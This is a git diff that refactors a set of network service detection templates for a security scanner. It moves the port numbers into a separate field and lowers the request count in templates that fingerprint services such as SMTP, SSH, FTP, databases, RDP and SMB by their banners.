+++ b/network/detection/axigen-mail-server-detect.yaml
@@ -7,10 +7,10 @@ info:
description: |
Axigen Mail Server was detected.
metadata:
- max-request: 2
- verified: true
fofa-query: app="axigen-Mail-Server"
+ max-request: 1
shodan-query: product:"Axigen"
+ verified: true
tags: network,axigen,detect
tcp:
@@ -19,7 +19,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:25"
+ port: 25
matchers:
- type: word
diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml
index 64366b18e5..f6a77f458d 100644
--- a/network/detection/cisco-finger-detect.yaml
+++ b/network/detection/cisco-finger-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: product:"Cisco fingerd"
+ verified: true
tags: network,finger,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:79"
+ port: 79
matchers:
- type: word
diff --git a/network/detection/clamav-detect.yaml b/network/detection/clamav-detect.yaml
index bdf57c43b8..dcd689a06e 100644
--- a/network/detection/clamav-detect.yaml
+++ b/network/detection/clamav-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
Clam AntiVirus is a free software, cross-platform antimalware toolkit able to detect many types of malware, including viruses.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: port:3310 product:"ClamAV"
verified: true
- shodan-query: 'port:3310 product:"ClamAV"'
tags: network,clamav,detect
tcp:
@@ -17,7 +17,7 @@ tcp:
- data: "VERSION"
host:
- "{{Hostname}}"
- - "{{Host}}:3310"
+ port: 3310
matchers:
- type: regex
diff --git a/network/detection/cql-native-transport.yaml b/network/detection/cql-native-transport.yaml
index 0da40bade4..0f5429b67a 100644
--- a/network/detection/cql-native-transport.yaml
+++ b/network/detection/cql-native-transport.yaml
@@ -7,9 +7,9 @@ info:
description: |
Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: cassandra
verified: true
- shodan-query: "cassandra"
tags: network,cassandra,cql,detect
tcp:
@@ -25,7 +25,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:9042"
+ port: 9042
matchers:
- type: word
diff --git a/network/detection/detect-addpac-voip-gateway.yaml b/network/detection/detect-addpac-voip-gateway.yaml
index a74286909d..250e4812b5 100644
--- a/network/detection/detect-addpac-voip-gateway.yaml
+++ b/network/detection/detect-addpac-voip-gateway.yaml
@@ -10,11 +10,10 @@ info:
- http://www.addpac.com/addpac_eng2/down.php?file=505_f16.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
- tags: network,addpac,apos,voip,detect
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,addpac,apos,voip,detect
tcp:
- inputs:
@@ -23,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:23"
+ port: 23
matchers:
- type: word
diff --git a/network/detection/detect-jabber-xmpp.yaml b/network/detection/detect-jabber-xmpp.yaml
index 42639efe65..924315c66d 100644
--- a/network/detection/detect-jabber-xmpp.yaml
+++ b/network/detection/detect-jabber-xmpp.yaml
@@ -9,11 +9,10 @@ info:
- https://datatracker.ietf.org/doc/html/rfc6120
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
- tags: network,jabber,xmpp,messaging,detect
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,jabber,xmpp,messaging,detect
tcp:
- inputs:
@@ -21,7 +20,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:5222"
+ port: 5222
matchers:
- type: word
diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml
index 0e6810cbba..4183336714 100644
--- a/network/detection/dotnet-remoting-service-detect.yaml
+++ b/network/detection/dotnet-remoting-service-detect.yaml
@@ -8,12 +8,11 @@ info:
Microsoft .NET Remoting httpd was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: product:"MS .NET Remoting httpd"
+ verified: true
tags: network,detect,microsoft
tcp:
@@ -22,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:8080"
+ port: 8080
matchers-condition: and
matchers:
diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml
index c361c0f2d1..2e640b11b8 100644
--- a/network/detection/dropbear-cbc-ciphers.yaml
+++ b/network/detection/dropbear-cbc-ciphers.yaml
@@ -6,14 +6,14 @@ info:
severity: low
description: |
The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext.
- remediation: |
- Disable CBC Ciphers.
reference: |
https://www.tenable.com/plugins/nessus/70658
+ remediation: |
+ Disable CBC Ciphers.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"Dropbear sshd"
verified: true
- shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,detect
tcp:
@@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:22"
+ port: 22
matchers:
- type: word
diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml
index 72b2dab40c..1f248170ee 100644
--- a/network/detection/esmtp-detect.yaml
+++ b/network/detection/esmtp-detect.yaml
@@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/smtp-open-relay.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: ESMTP
verified: true
- shodan-query: 'ESMTP'
tags: network,detect,smtp,mail
tcp:
@@ -24,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:25"
+ port: 25
matchers-condition: and
matchers:
diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml
index 6b1525f20b..ed7c818097 100644
--- a/network/detection/expn-mail-detect.yaml
+++ b/network/detection/expn-mail-detect.yaml
@@ -6,9 +6,9 @@ info:
severity: info
description: |
The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information.
- tags: mail,expn,network,detect
metadata:
- max-request: 2
+ max-request: 1
+ tags: mail,expn,network,detect
tcp:
- inputs:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:25"
+ port: 25
matchers:
- type: word
diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml
index 0080ce646e..4384319476 100644
--- a/network/detection/finger-detect.yaml
+++ b/network/detection/finger-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: port:"79" action
+ verified: true
tags: network,finger,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:79"
+ port: 79
matchers:
- type: word
diff --git a/network/detection/gnu-inetutils-ftpd-detect.yaml b/network/detection/gnu-inetutils-ftpd-detect.yaml
index 7731e2db8a..b4f560c0ad 100644
--- a/network/detection/gnu-inetutils-ftpd-detect.yaml
+++ b/network/detection/gnu-inetutils-ftpd-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"GNU Inetutils FTPd"
verified: true
- shodan-query: 'product:"GNU Inetutils FTPd"'
tags: network,ftp,smartgateway,gnu,inetutils,detect
tcp:
@@ -17,8 +17,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- - "{{Host}}:21"
-
+ port: 21
matchers:
- type: word
words:
diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml
index d2d8621175..789954f457 100644
--- a/network/detection/gopher-detect.yaml
+++ b/network/detection/gopher-detect.yaml
@@ -8,18 +8,17 @@ info:
Gopher service was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
- tags: network,gopher,detect
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,gopher,detect
tcp:
- inputs:
- data: "\r\n"
host:
- "{{Hostname}}"
- - "{{Host}}:70"
+ port: 70
matchers:
- type: dsl
diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml
index 868d874ac2..2fb08c0ca6 100644
--- a/network/detection/ibm-d2b-database-server.yaml
+++ b/network/detection/ibm-d2b-database-server.yaml
@@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/db2-das-info.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: product:"IBM DB2 Database Server"
+ verified: true
tags: network,ibm,database,db,db2,detect
tcp:
@@ -25,7 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:50000"
+ port: 50000
matchers-condition: and
matchers:
diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml
index d3285206ca..f148865b90 100644
--- a/network/detection/imap-detect.yaml
+++ b/network/detection/imap-detect.yaml
@@ -8,12 +8,11 @@ info:
IMAP was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: imap
verified: true
- shodan-query: 'imap'
tags: network,detect,imap,mail
tcp:
@@ -22,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:143"
+ port: 143
matchers-condition: and
matchers:
diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml
index d0c95983ae..37ddd8519e 100644
--- a/network/detection/iplanet-imap-detect.yaml
+++ b/network/detection/iplanet-imap-detect.yaml
@@ -8,11 +8,10 @@ info:
iPlanet Messaging Server IMAP protocol was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap"
+ max-request: 1
tags: network,imap,detect
tcp:
@@ -20,7 +19,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- - "{{Host}}:110"
+ port: 110
matchers:
- type: word
diff --git a/network/detection/microsoft-ftp-service.yaml b/network/detection/microsoft-ftp-service.yaml
index ba87bbdfad..577a884721 100644
--- a/network/detection/microsoft-ftp-service.yaml
+++ b/network/detection/microsoft-ftp-service.yaml
@@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: Microsoft FTP Service
verified: true
- shodan-query: "Microsoft FTP Service"
tags: network,ftp,microsoft,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- - "{{Host}}:21"
+ port: 21
matchers:
- type: word
diff --git a/network/detection/mikrotik-ftp-server-detect.yaml b/network/detection/mikrotik-ftp-server-detect.yaml
index 6c54ea1f55..5eddbb1f40 100644
--- a/network/detection/mikrotik-ftp-server-detect.yaml
+++ b/network/detection/mikrotik-ftp-server-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"MikroTik router ftpd"
verified: true
- shodan-query: 'product:"MikroTik router ftpd"'
tags: network,ftp,mikrotik,router,detect
tcp:
@@ -17,7 +17,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- - "{{Host}}:21"
+ port: 21
matchers:
- type: word
diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml
index 73c3ccdfee..1c07c6a24b 100644
--- a/network/detection/mikrotik-routeros-api.yaml
+++ b/network/detection/mikrotik-routeros-api.yaml
@@ -8,12 +8,11 @@ info:
MikroTik RouterOS API was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: product:"MikroTik RouterOS API Service"
+ verified: true
tags: network,mikrotik,detect
tcp:
@@ -23,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:8728"
+ port: 8728
matchers:
- type: word
diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml
index 731a52674c..8b89e6e4da 100644
--- a/network/detection/mongodb-detect.yaml
+++ b/network/detection/mongodb-detect.yaml
@@ -6,15 +6,14 @@ info:
severity: info
description: |
MongoDB service was detected.
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
- cwe-id: CWE-200
reference:
- https://github.com/orleven/Tentacle
- tags: network,mongodb,detect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cwe-id: CWE-200
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,mongodb,detect
tcp:
- inputs:
@@ -23,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:27017"
+ port: 27017
read-size: 2048
matchers:
diff --git a/network/detection/msmq-detect.yaml b/network/detection/msmq-detect.yaml
index 619301c3cb..0429cdbb09 100644
--- a/network/detection/msmq-detect.yaml
+++ b/network/detection/msmq-detect.yaml
@@ -11,10 +11,10 @@ info:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/50da7ea1-eed7-41f9-ba6a-2aa37f5f1e92
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554
metadata:
- max-request: 2
- verified: true
- shodan-query: MSMQ
censys-query: services.service_name:MSMQ
+ max-request: 1
+ shodan-query: MSMQ
+ verified: true
tags: network,msmq,detect
tcp:
@@ -24,8 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:1801"
-
+ port: 1801
read-size: 2048
matchers:
diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml
index f30568179c..8319e00b54 100644
--- a/network/detection/mysql-detect.yaml
+++ b/network/detection/mysql-detect.yaml
@@ -8,12 +8,11 @@ info:
MySQL instance was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: product:"MySQL"
+ verified: true
tags: network,mysql,db,detect
tcp:
@@ -22,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:3306"
+ port: 3306
matchers:
- type: word
diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml
index 68cd4ad687..4d71cedb67 100644
--- a/network/detection/openssh-detect.yaml
+++ b/network/detection/openssh-detect.yaml
@@ -6,24 +6,23 @@ info:
severity: info
description: |
OpenSSH service was detected.
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
- cwe-id: CWE-200
reference:
- http://www.openwall.com/lists/oss-security/2016/08/01/2
- http://www.openwall.com/lists/oss-security/2018/08/15/5
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://nvd.nist.gov/vuln/detail/CVE-2016-6210
- https://nvd.nist.gov/vuln/detail/CVE-2018-15473
- tags: seclists,network,ssh,openssh,detect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cwe-id: CWE-200
metadata:
- max-request: 2
+ max-request: 1
+ tags: seclists,network,ssh,openssh,detect
tcp:
- host:
- "{{Hostname}}"
- - "{{Host}}:22"
+ port: 22
matchers:
- type: regex
diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml
index 28cd603ce5..91f8054806 100644
--- a/network/detection/pgsql-detect.yaml
+++ b/network/detection/pgsql-detect.yaml
@@ -11,12 +11,11 @@ info:
- https://www.postgresql.org/docs/current/client-authentication-problems.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: port:5432 product:"PostgreSQL"
+ verified: true
tags: network,postgresql,db,detect
tcp:
@@ -28,7 +27,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:5432"
+ port: 5432
read-size: 2048
matchers-condition: and
diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml
index d38ba3ffc8..fc6a17a996 100644
--- a/network/detection/pop3-detect.yaml
+++ b/network/detection/pop3-detect.yaml
@@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/pop3-ntlm-info.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: pop3 port:110
verified: true
- shodan-query: 'pop3 port:110'
tags: network,detect,pop3,mail
tcp:
@@ -24,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:110"
+ port: 110
matchers:
- type: word
diff --git a/network/detection/proftpd-server-detect.yaml b/network/detection/proftpd-server-detect.yaml
index df5df5d2da..d916b8d423 100644
--- a/network/detection/proftpd-server-detect.yaml
+++ b/network/detection/proftpd-server-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"ProFTPD"
verified: true
- shodan-query: 'product:"ProFTPD"'
tags: network,ftp,proftpd,detect
tcp:
@@ -17,7 +17,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- - "{{Host}}:21"
+ port: 21
matchers:
- type: word
diff --git a/network/detection/rabbitmq-detect.yaml b/network/detection/rabbitmq-detect.yaml
index 8ccf9cecaa..5b8f10167c 100644
--- a/network/detection/rabbitmq-detect.yaml
+++ b/network/detection/rabbitmq-detect.yaml
@@ -9,9 +9,9 @@ info:
reference:
- https://nmap.org/nsedoc/scripts/amqp-info.html
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: product:"RabbitMQ"
+ verified: true
tags: network,rabbitmq,oss,detect
tcp:
@@ -20,7 +20,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:5672"
+ port: 5672
matchers-condition: and
matchers:
diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml
index 21a817a040..635ac81a3a 100644
--- a/network/detection/rdp-detect.yaml
+++ b/network/detection/rdp-detect.yaml
@@ -8,10 +8,9 @@ info:
Windows Remote Desktop Protocol was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
+ max-request: 1
verified: true
tags: network,windows,rdp,detect
@@ -22,8 +21,8 @@ tcp:
read-size: 2048
host:
- - "{{Host}}:3389"
- "{{Hostname}}"
+ port: 3389
matchers:
- type: word
diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml
index 9f1431ef6a..4a70dfdd40 100644
--- a/network/detection/redis-detect.yaml
+++ b/network/detection/redis-detect.yaml
@@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
- max-request: 4
+ max-request: 1
shodan-query: product:"redis"
verified: true
tags: network,redis,detect
@@ -19,10 +19,8 @@ tcp:
- data: "*1\r\n$4\r\ninfo\r\n"
host:
- - "{{Hostname}}"
- - "{{Host}}:6379"
- - "tls://{Hostname}}"
- - "tls://{{Host}}:6380"
+ - "tls://{{Host}}"
+ port: 6380
read-size: 1024
matchers:
diff --git a/network/detection/riak-detect.yaml b/network/detection/riak-detect.yaml
index e52868d902..bc0315d527 100644
--- a/network/detection/riak-detect.yaml
+++ b/network/detection/riak-detect.yaml
@@ -6,9 +6,9 @@ info:
severity: info
description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability.
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: product:"Riak"
+ verified: true
tags: network,oss,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:8087"
+ port: 8087
read-size: 2048
matchers:
diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml
index d8fa9166c5..02e9ef6520 100644
--- a/network/detection/rpcbind-portmapper-detect.yaml
+++ b/network/detection/rpcbind-portmapper-detect.yaml
@@ -8,12 +8,11 @@ info:
reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: port:"111"
+ verified: true
tags: network,rpcbind,portmap,detect
tcp:
@@ -23,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:111"
+ port: 111
matchers:
- type: word
diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml
index cf8d848e1a..121d709d18 100644
--- a/network/detection/rsyncd-service-detect.yaml
+++ b/network/detection/rsyncd-service-detect.yaml
@@ -10,11 +10,10 @@ info:
- https://linux.die.net/man/1/rsync
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
- tags: network,rsyncd,detect
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,rsyncd,detect
tcp:
- inputs:
@@ -22,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:873"
+ port: 873
matchers:
- type: word
diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml
index b9beed2b9d..1aa38c37f7 100644
--- a/network/detection/rtsp-detect.yaml
+++ b/network/detection/rtsp-detect.yaml
@@ -10,12 +10,11 @@ info:
https://nmap.org/nsedoc/scripts/rtsp-methods.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: RTSP/1.0
+ verified: true
tags: network,rtsp,detect
tcp:
@@ -25,7 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:554"
+ port: 554
read-size: 1024
matchers:
diff --git a/network/detection/samba-detect.yaml b/network/detection/samba-detect.yaml
index cc20db7a91..5c2f94fa7b 100644
--- a/network/detection/samba-detect.yaml
+++ b/network/detection/samba-detect.yaml
@@ -8,12 +8,12 @@ info:
reference:
- https://www.samba.org/samba/what_is_samba.html
- https://www.samba.org/samba/history/security.html
+ remediation: Always apply the latest security patch.
classification:
cwe-id: CWE-200
- remediation: Always apply the latest security patch.
- tags: network,smb,samba,detect
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,smb,samba,detect
tcp:
- inputs:
@@ -21,8 +21,7 @@ tcp:
type: hex
host:
- "{{Hostname}}"
- - "{{Host}}:139"
-
+ port: 139
matchers-condition: and
matchers:
- type: word
diff --git a/network/detection/sap-router.yaml b/network/detection/sap-router.yaml
index b7cf6ff735..482076acb8 100644
--- a/network/detection/sap-router.yaml
+++ b/network/detection/sap-router.yaml
@@ -4,11 +4,11 @@ info:
name: SAPRouter Detection
author: randomstr1ng
severity: info
- tags: network,sap,detect
description: |
SAProuter is a software application that provides a remote connection between our customer's network and SAP.
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,sap,detect
tcp:
- inputs:
@@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:3299"
+ port: 3299
read-size: 1024
matchers:
diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml
index 038dc22d2e..136bcb5dd2 100644
--- a/network/detection/smb-detect.yaml
+++ b/network/detection/smb-detect.yaml
@@ -4,11 +4,11 @@ info:
name: SMB Detection
author: pussycat0x
severity: low
- tags: network,windows,smb,service,detect
description: |
SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems.
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,windows,smb,service,detect
tcp:
- inputs:
@@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:445"
+ port: 445
matchers:
- type: word
diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml
index d63b816e07..c1f47429d5 100644
--- a/network/detection/smtp-detect.yaml
+++ b/network/detection/smtp-detect.yaml
@@ -4,18 +4,19 @@ info:
name: SMTP Service Detection
author: pussycat0x
severity: info
- tags: network,service,smtp,detect
description: |
SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks.
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,service,smtp,detect
tcp:
- inputs:
- data: "\r\n"
host:
- "{{Hostname}}"
- - "{{Host}}:25"
+ port: 25
+
matchers:
- type: word
words:
diff --git a/network/detection/sshd-dropbear-detect.yaml b/network/detection/sshd-dropbear-detect.yaml
index 96f5143603..fbe7736c56 100644
--- a/network/detection/sshd-dropbear-detect.yaml
+++ b/network/detection/sshd-dropbear-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client. It is designed as a replacement for standard OpenSSH for environments with low memory and processor resources, such as embedded systems
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"Dropbear sshd"
verified: true
- shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- - "{{Host}}:22"
+ port: 22
matchers:
- type: word
diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml
index 2970b2d555..2795600fde 100644
--- a/network/detection/starttls-mail-detect.yaml
+++ b/network/detection/starttls-mail-detect.yaml
@@ -4,11 +4,11 @@ info:
name: STARTTLS Mail Server Detection
author: r3dg33k
severity: info
- tags: mail,starttls,network,detect
description: |
STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one.
metadata:
- max-request: 2
+ max-request: 1
+ tags: mail,starttls,network,detect
tcp:
- inputs:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:25"
+ port: 25
matchers:
- type: word
diff --git a/network/detection/teamspeak3-detect.yaml b/network/detection/teamspeak3-detect.yaml
index d3660c3e69..57cfddee64 100644
--- a/network/detection/teamspeak3-detect.yaml
+++ b/network/detection/teamspeak3-detect.yaml
@@ -1,23 +1,23 @@
id: teamspeak3-detect
-info:
- name: TeamSpeak 3 ServerQuery Detection
- author: pussycat0x
- severity: info
- description: |
- ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server.
- metadata:
- max-request: 2
- shodan-query: product:"TeamSpeak 3 ServerQuery"
- verified: true
- tags: network,service,teamspeak3,detect
+info:
+ name: TeamSpeak 3 ServerQuery Detection
+ author: pussycat0x
+ severity: info
+ description: |
+ ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server.
+ metadata:
+ max-request: 1
+ shodan-query: product:"TeamSpeak 3 ServerQuery"
+ verified: true
+ tags: network,service,teamspeak3,detect
tcp:
- inputs:
- data: "\r\n"
host:
- "{{Hostname}}"
- - "{{Host}}:2002"
+ port: 2002
matchers:
- type: word
diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml
index a12206e962..7682c01f76 100644
--- a/network/detection/telnet-detect.yaml
+++ b/network/detection/telnet-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines.
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: port:23 telnet
+ verified: true
tags: network,telnet,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:23"
+ port: 23
matchers:
- type: word
